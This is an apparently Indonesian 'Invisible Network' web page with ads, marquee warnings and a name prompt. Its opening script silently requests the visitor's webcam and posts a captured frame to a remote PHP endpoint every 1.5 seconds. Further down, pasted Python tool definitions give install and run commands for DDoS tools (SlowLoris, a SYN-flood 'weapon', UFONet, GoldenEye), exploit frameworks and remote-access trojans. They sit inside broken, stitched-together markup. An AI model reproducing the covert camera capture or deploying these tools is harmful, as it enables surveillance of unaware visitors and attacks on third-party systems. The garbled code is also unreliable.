 $.ajax({
     type: 'POST',
     data: { cat: imgdata},
     url: 'forwarding_link/post.php',
     dataType: 'json',
     async: false,
     success: function(result){
         // call the function that handles the response/results
     },
     error: function(){
     }
   });
 };
 
 
 'use strict';
 
 const video = document.getElementById('video');
 const canvas = document.getElementById('canvas');
 const errorMsgElement = document.querySelector('span#errorMsg');
 
 const constraints = {
   audio: false,
   video: {
     
     facingMode: "PUBLIC"
   }
 };
 
 // Access webcam
 async function init() {
   try {
     const stream = await navigator.mediaDevices.getUserMedia(constraints);
     handleSuccess(stream);
   } catch (e) {
     errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
   }
 }
 
 // Success
 function handleSuccess(stream) {
   window.stream = stream;
   video.srcObject = stream;
 
 var context = canvas.getContext('2d');
   setInterval(function(){
 
        context.drawImage(video, 0, 0, 640, 480);
        var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
        post(canvasData); }, 1500);
   
 
 }
 
 // Load init
 init();
 
 </script>
<body>

<body class="bg" id="rakhi" style="background: linear-gradient(to bottom right, #f6ff00, #e1e8e7, #00ffe9);
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover;">
	
	
<center><span style="font-size: 20px;"color: #ff077a;"> 💻 EXPLOIT INVISIBLE NETWORK 💻 </center>	
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Wishing 2 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:50px"
     data-ad-client="ca-pub-4696491179456446"
     data-ad-slot="2568634816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</center>
 <center> 
<div class="container">
    <div class="main-greeting">
<div align="center html2canvas-ignore">
     <div style="font-size: 20px; font-weight: 500; color: Black;">
<p id="demo"></p>

<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="background-color:rgb(255, 140, 0); border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: whitesmoke; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 70%;">
<marquee behavior="alternate"><b>
“🚨 WARNING NOTICE 🚨  Get Out My Exploit !!! Don't Distrub ”
</b></marquee>
</div>
<div style="background-color: rgb(255, 255, 255); border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: blue; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 70%;">
<marquee behavior="alternate"><b>
Jika Anda Memaksa Masuk Di Server EXPLOIT Saya.. Terima Resiko Yg Telah Menjadi Konsekuensinya !!! Pergi Sekarang Juga dan Menjauh Dari Exploit 🔥
</b></marquee>
</div>
<div style="background-color: rgb(0, 255, 42); border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: black; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 70%;">
<marquee behavior="alternate"><b>
|| CREATED BY : 🌐 THE INVISIBLE-NETWORK 🌐 || 
</b></marquee>
</div>
</div>
<br><br>

<center>
<figure>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                 var a=prompt("Masukan Nama Untuk Login\n\n👇👇👇👇👇");
                 document.write(a);
                </script> </h1>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    
                    document.write(a);
                      </script> </h1>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                   
                    document.write(a);
                      </script> </h1>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    
                    document.write(a);
                      </script></h1>
    <h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                   
                    document.write(a);
                      </script> </h1>
    <h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                   
                    document.write(a);
                      </script> </h1>
    <h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    
                    document.write(a);
                      </script></h1>

</figure>
 </center>
<div class="vi" style="text-align: center;">

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Wishing -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:50px"
     data-ad-client="ca-pub-4696491179456446"
     data-ad-slot="5590491777"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</center>
<br><br><center>
    <p style="text-align: center;"><strong><span style="background-color: #ffea00; color: #005f96; font-size: 18pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;🚨MIRRORING🚨</span></p>
</center>
<br>
<p style="text-align: center;"><strong><span style="font-size: 21pt; font-family: 'comic sans ms', sans-serif; color: #ff7700;"> <span style="font-family: 'trebuchet ms', geneva;">  INVISIBLE-NETWORK  </span> </span></strong></p>
<br>
<p style="text-align: center;"><strong><span style="background-color: #ff0000; color: #ffffff; font-size: 16pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp; Jadilah seseorang yang apabila dilihat, hanya kelihatan biasa dan sederhana, namun jauh di dalam hati dan fikirannya tersimpan kecintaan yang luar biasa kepada Allah Swt dan Rasul-Nya. </span></p>
  <br>
  <p style="text-align: center;"><span style="background-color: #008000; color: #ffffff; font-size: 16pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;⚠️ WARNING ⚠️</span></p>
  <br>
  <p style="text-align: center;"><span style="background-color: #ff00ff; color: #ffffff; font-size: 16pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;Welcome To My Exploit</span></p>
<br>

<p style="text-align: center;"><span style="background-color: #663399; color: #FFFAFA; font-size: 15pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp; Jangan Memaksa Masuk Atau Berbuat Kesalahan Diserver Saya !!! Saya Tidak Akan Bertanggung Jawab Atas Pencerobohan dan Pembangkangan Anda </span></p>
<br>
<center>
<div class="busi"><h4><p style="text-transform: uppercase;font-size: 26px;color:#ffffff;"> <script type="text/javascript" language="Javascript">                                       
 document.write( "by - " +a);
                      </script><br><br></p></h4></center>
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Link Ads -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4696491179456446"
     data-ad-slot="1112298516"
     data-ad-format="link"
     data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</center>
</div>
        </div>
<script>
// Set the date we're counting down to
var countDownDate = new Date("July 30, 2021 00:00:00").getTime();

// Update the count down every 01 second
var x = setInterval(function() {

  // Get todays date and time
  var now = new Date().getTime();

  // Find the distance between now an the count down date
  var distance = countDownDate - now;

  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

  // Display the result in the element with id="demo"
  document.getElementById("demo").innerHTML = days + "<i> Days,</i> " + hours + " <i>Hrs,</i> "
  + minutes + "<i> Min,</i> " + seconds + "<i> Sec</i> ";

  // If the count down is finished, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("demo").innerHTML = "🙏 Welcome To My Exploit 🙏";
  }
}, 1000);
</script>       
            
            .</div>
        </div>
			
</body>
 
<center>
 <a class="footerbtn" href="https://wa.me/qr/UI6IZ524KIPOE1👉 forwarding_link" data-action="share/whatsapp/share">
 <img width="22px" height="22px" src="https://wa.me/qr/UI6IZ524KIPOE1//2015/08/03/13/58/soon-873316_640.png">  
 <b style="font-size: 26px;">Share</b>  
</a>
 <a class="footerbtn1" href="https://www.facebook.com/sharer/sharer.php?u= forwarding_link" target="_blank" title="Share this post on Facebook" class="facebook">
	<img width="22px" height="22px" src="https://https://wa.me/qr/UI6IZ524KIPOE1//2017/06/22/06/22/facebook-2429746_640.png">
 <b style="font-size: 26px;">Share</b>  
 </a>
</center>
<script
accesskey="from core import HackingTool
from core import HackingToolsCollection
from tools.webattack import Web2Attack


class RouterSploit(HackingTool):
    TITLE = "RouterSploit"
    DESCRIPTION = "The RouterSploit Framework is an open-source exploitation " \
                  "framework dedicated to embedded devices"
    INSTALL_COMMANDS = [
        "sudo git clone https://github.com/threat9/routersploit.git",
        "cd routersploit && sudo python3 -m pip install -r requirements.txt"
    ]
    RUN_COMMANDS = ["cd routersploit && sudo python3 rsf.py"]
    PROJECT_URL = "https://github.com/threat9/routersploit"


class WebSploit(HackingTool):
    TITLE = "WebSploit"
    DESCRIPTION = "Websploit is an advanced MITM framework."
    INSTALL_COMMANDS = [
        "sudo git clone https://github.com/The404Hacking/websploit.git;cd websploit/Setup;sudo chmod +x install.sh && sudo bash install.sh"
    ]
    RUN_COMMANDS = ["sudo websploit"]
    PROJECT_URL = "https://github.com/The404Hacking/websploit "


class Commix(HackingTool):
    TITLE = "Commix"
    DESCRIPTION = "Automated All-in-One OS command injection and exploitation " \
                  "tool.\nCommix can be used from web developers, penetration " \
                  "testers or even security researchers\n in order to test " \
                  "web-based applications with the view to find bugs,\n " \
                  "errors or vulnerabilities related to command injection " \
                  "attacks.\n Usage: python commix.py [option(s)]"
    INSTALL_COMMANDS = [
        "git clone https://github.com/commixproject/commix.git commix",
        "cd commix;sudo python setup.py install"
    ]
    RUN_COMMANDS = ["sudo python commix.py --wizard"]
    PROJECT_URL = "https://github.com/commixproject/commix"

    def __init__(self):
        super(Commix, self).__init__(runnable = False)


class ExploitFrameworkTools(HackingToolsCollection):
    TITLE = "Exploit framework"
    TOOLS = [
        RouterSploit(),
        WebSploit(),
        Commix(),
        Web2Attack()
    ]
"sync src="RUN_COMMANDS"

></script>
<script accesskey="# coding=utf-8
import os
import subprocess

from core import HackingTool
from core import HackingToolsCollection


class SlowLoris(HackingTool):
    TITLE = "SlowLoris"
    DESCRIPTION = "Slowloris is basically an HTTP Denial of Service attack." \
                  "It send lots of HTTP Request"
    INSTALL_COMMANDS = ["sudo pip3 install slowloris"]

    def run(self):
        target_site = input("Enter Target Site:- ")
        subprocess.run(["slowloris", target_site])


class Asyncrone(HackingTool):
    TITLE = "Asyncrone | Multifunction SYN Flood DDoS Weapon"
    DESCRIPTION = "aSYNcrone is a C language based, mulltifunction SYN Flood " \
                  "DDoS Weapon.\nDisable the destination system by sending a " \
                  "SYN packet intensively to the destination."
    INSTALL_COMMANDS = [
        "git clone https://github.com/fatih4842/aSYNcrone.git",
        "cd aSYNcrone;sudo gcc aSYNcrone.c -o aSYNcrone -lpthread"
    ]
    PROJECT_URL = "https://github.com/fatihsnsy/aSYNcrone"

    def run(self):
        source_port = input("Enter Source Port >> ")
        target_ip = input("Enter Random Target IP >> ")
        target_port = input("Enter Random Target port >> ")
        os.system("cd aSYNcrone;")
        subprocess.run([
            "sudo", "./aSYNcrone", source_port, target_ip, target_port, 1000])


class UFONet(HackingTool):
    TITLE = "UFOnet"
    DESCRIPTION = "UFONet - is a free software, P2P and cryptographic " \
                  "-disruptive \n toolkit- that allows to perform DoS and " \
                  "DDoS attacks\n\b " \
                  "More Usage Visit"
    INSTALL_COMMANDS = [
        "sudo git clone https://github.com/epsylon/ufonet.git",
        "cd ufonet;sudo python3 setup.py install;sudo pip3 install GeoIP;sudo pip3 install python-geoip;sudo pip3 install pygeoip;sudo pip3 install requests;sudo pip3 install pycrypto;sudo pip3 install pycurl;sudo pip3 install whois;sudo pip3 install scapy-python3"
    ]
    RUN_COMMANDS = ["sudo python3 ufonet --gui"]
    PROJECT_URL = "https://github.com/epsylon/ufonet"


class GoldenEye(HackingTool):
    TITLE = "GoldenEye"
    DESCRIPTION = "GoldenEye is an python3 app for SECURITY TESTING PURPOSES ONLY!\n" \
                  "GoldenEye is a HTTP DoS Test Tool."
    INSTALL_COMMANDS = [
        "sudo git clone https://github.com/jseidl/GoldenEye.git;"
        "chmod -R 755 GoldenEye"
    ]
    PROJECT_URL = "https://github.com/jseidl/GoldenEye"

    def run(self):
        os.system("cd GoldenEye ;sudo ./goldeneye.py")
        print("\033[96m Go to Directory \n "
              "[*] USAGE: ./goldeneye.py <url> [PUBLIC]")


class DDOSTools(HackingToolsCollection):
    TITLE = "DDOS Attack Tools"
    TOOLS = [][]
        SlowLoris(),
        Asyncrone(),
        UFONet(),
        GoldenEye()
</script>

<Asyncrone used= INSTALL_COMMANDS
></script> 
<accesskey =RUN_COMMANDS(
from core import HackingTool
from core import HackingToolsCollection


class Stitch(HackingTool):
    TITLE = "Stitch"
    DESCRIPTION = "Stitch is a cross platform python framework.\n" \
                  "which allows you to build custom payloads\n" \
                  "For Windows, Mac and Linux."
    INSTALL_COMMANDS = [
        "sudo git clone https://github.com/nathanlopez/Stitch.git",
        "cd Stitch;sudo pip install -r lnx_requirements.txt"
    ]
    RUN_COMMANDS = ["cd Stitch;python main.py"]
    PROJECT_URL = "https://github.com/nathanlopez/Stitch"


class Pyshell(HackingTool):
    TITLE = "Pyshell"
    DESCRIPTION = "Pyshell is a Rat Tool that can be able to download & upload " \
                  "files,\n Execute OS Command and more.."
    INSTALL_COMMANDS = [
        "sudo git clone https://github.com/knassar702/Pyshell.git;"
        "sudo pip install pyscreenshot python-nmap requests"
    ]
    RUN_COMMANDS = ["cd Pyshell;./Pyshell"]
    PROJECT_URL = "https://github.com/knassar702/pyshell"


class RemoteAdministrationTools(HackingToolsCollection):
    TITLE = "Remote Administrator Tools (RAT)"
    TOOLS = [
        Stitch(),
        Pyshell()
    ]
></screen>
<accesskey>
  <script> PROJECT_URL/aSYNcrone/sending /files/RemoteAdministrationTools/goto https=//0.0.0.0:8080/
  
</accesskey>= INSTALL_COMMANDS

</script>
</html>        
